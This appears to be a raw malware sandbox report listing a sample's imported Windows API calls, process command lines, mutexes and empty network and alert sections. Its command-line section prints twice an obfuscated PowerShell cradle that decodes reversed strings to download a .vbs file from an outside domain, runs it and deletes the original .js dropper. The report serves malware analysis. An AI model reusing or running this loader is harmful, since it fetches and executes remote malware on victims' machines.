api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoImpersonateClient
api-ms-win-downlevel-ole32-l1-1-0.dll.CoRevertToSelf
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
api-ms-win-downlevel-advapi32-l1-1-0.dll.EqualSid
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventUnregister
secur32.dll.GetUserNameExA
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
ole32.dll.CoInitializeSecurity
pcasvc.dll.ServiceMain
pcasvc.dll.SvchostPushServiceGlobals
msi.dll.#45
shell32.dll.CommandLineToArgvW
secur32.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
user32.dll.RegisterRawInputDevices
user32.dll.SetTimer
user32.dll.SetWindowsHookExW
user32.dll.MsgWaitForMultipleObjects
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventActivityIdControl
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegDeleteValueW
oleaut32.dll.#4
oleaut32.dll.#7
dnsapi.dll.DnsGetProxyInformation
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
dhcpcsvc.dll.DhcpRequestParams
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpSetStatusCallback
wininet.dll.InternetGetCookieExW
urlmon.dll.CoInternetCreateZoneManager
winhttp.dll.WinHttpAddRequestHeaders
winhttp.dll.WinHttpSendRequest
ws2_32.dll.#2
ws2_32.dll.#9
ws2_32.dll.FreeAddrInfoW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
user32.dll.PeekMessageW
user32.dll.TranslateMessage
user32.dll.DispatchMessageW
user32.dll.RegisterPowerSettingNotification
powrprof.dll.PowerSettingRegisterNotification
user32.dll.GetWindowTextW
user32.dll.KillTimer
ws2_32.dll.WSAGetOverlappedResult
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\LCSSW.js"
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /user
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
C:\Users\user\AppData\Local\Temp\notepad.vbs
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
Global\ClickToRunPackageLocker
Local\10MU_ACBPIDS_S-1-5-5-0-232465
Local\10MU_ACB10_S-1-5-5-0-232465
Office16.B1E641B5-F92B-4B82-83B7-10DC868435E8
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Global\552FFA80-3393-423d-8671-7BA046BB5906
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
Local\F99C425F-9135-43ed-BD7D-396DE488DC53_Office16
Global\MTX_MSO_Formal1_S-1-5-21-2476309959-3960023044-3115063449-1000
Global\MTX_MSO_AdHoc1_S-1-5-21-2476309959-3960023044-3115063449-1000
Local\Shell.CMruPidlList
5CAC3FAB-87F0-4750-984D-D50144543427Office-VER16
Local\ClickToRun_User_SingleInstance_16
Global\ClickToRun_ExecutionContext
Global\ClickToRun_AC2F0D89-6518-48E9-A0D9-EF039C456034
osppsvc
PcaSvc
No results
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.